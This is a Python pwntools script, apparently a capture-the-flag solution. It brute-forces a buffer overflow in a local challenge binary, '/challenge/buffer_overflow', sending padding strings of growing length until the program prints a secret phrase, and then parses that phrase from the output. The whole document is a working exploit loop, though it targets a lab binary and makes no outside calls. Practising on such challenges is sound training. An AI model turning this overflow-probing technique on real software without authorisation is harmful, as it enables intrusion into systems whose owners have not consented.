#!/usr/bin/env python3
from pwn import *

# Set the log level to info to track our progress cleanly
context.log_level = 'info'

def extract_secret_phrase():
    log.info("Brute-forcing the buffer overflow to extract the phrase...")

    # Based on our previous analysis, we know the overflow happens under 30 characters
    for i in range(1, 30):
        try:
            # Run the vulnerable binary
            p = process('/challenge/buffer_overflow')

            # Send the test padding string
            payload = b'a' * i
            p.sendlineafter(b"trigger the function call.", payload)

            # Read all output generated by the binary
            output = p.recvall(timeout=0.2)
            p.close()

            # Check if the output contains the winning milestone string
            if b"The secret phrase is:" in output:
                log.success(f"Triggered success condition at payload size: {i}")

                # Parse out the secret phrase from the terminal output bytes
                lines = output.split(b"\n")
                for line in lines:
                    if b"The secret phrase is:" in line:
                        # Extract everything after the colon and strip whitespace
                        phrase = line.split(b":")[1].strip()
                        return phrase

        except (EOFError, PwnlibException):
            # Program crashed with a Segmentation fault (expected during brute force)
            continue

    return None
